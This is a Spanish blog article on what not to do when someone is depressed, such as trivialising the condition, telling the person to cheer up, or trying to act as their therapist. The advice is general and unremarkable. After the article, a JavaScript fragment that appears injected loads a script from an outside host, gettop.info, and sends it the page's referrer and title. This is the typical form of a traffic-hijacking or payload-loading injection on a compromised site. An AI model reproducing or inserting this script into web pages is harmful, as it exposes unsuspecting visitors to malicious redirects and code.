Salud y belleza » Enfermedades, Salud

Lo que no debes hacer cuando alguien está deprimido

Sin Comentarios

persona-depresivaLa tristeza patológica es más conocida por los expertos como depresión y afecta a alrededor de un 5% de los españoles. Se trata de una de las epidemias de nuestro siglo y que en poco tiempo se convertirá en principal causa de invalidez mundial. No es ninguna minucia y por eso es importante prestarle la atención que se merece.

La depresión es un problema que impacta de forma negativa en la vida de la gente y también en la de los que le rodean, que son los primeros que detectan una depresión. Para esas personas tampoco es nada fácil ver a alguien a quien quieran atravesando una situación tan angustiosa. Tampoco están preparados para ello y a menudo actúan cometiendo una serie de errores que empeoran la situación. Estos son los errores más comunes en los que no debes caer si alguien está deprimido.

- Trivializar la situación: ante una persona triste y negativa hay que intentar cambiar el estado de ánimo, pero no es fácil porque la depresión anula la voluntad de la persona. Hay que favorecer que entienda que los problemas psicológicos (al igual que los físicos) necesitan un tratamiento.

- No debemos ver el problema desde nuestro punto de vista, sino tratar de empatizar con sus circunstancias y entender qué es lo que necesita. Ante la duda, lo mejor es preguntar.

- Solucionarlo con un “anímate”: esto no arregla nada porque la persona que sufre depresión no tiene voluntad para animarse por sí sola. Está encerrada en su oscuridad interior y esta frase no le va a ayudar, lo que puede hacer es que la otra persona se sienta más triste y culpable.

- Imponer en lugar de proponer: es mejor sugerir las ideas, los planes y las soluciones que no obligar a que cierta persona haga lo que creemos mejor.

- Asumir sus decisiones: si estamos al cuidado de una persona depresiva, esta persona está triste, pero  no por ello deja de ser capaz de tomar sus decisiones. Hay que ser sus cómplices, no sus verdugos, y buscar un equilibrio.

- Alimentar el discurso negativo: darle la razón al depresivo sobre que todo lo que le pasa es negro y malo… fomentar esos discursos negativos solo hará más difícil superar su estado porque aunque en el momento se sienta bien por compartir una opinión, con el tiempo se sentirá peor por todo lo que le rodea.

- Intentar ser su psicólogo: puede ser un apoyo pero es preferible que acuda a un profesional y que no intentes hacer las veces de éste porque no tendrás las herramientas ni métodos necesarios.

¿Sabes cómo comportarte con una persona depresiva?

document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.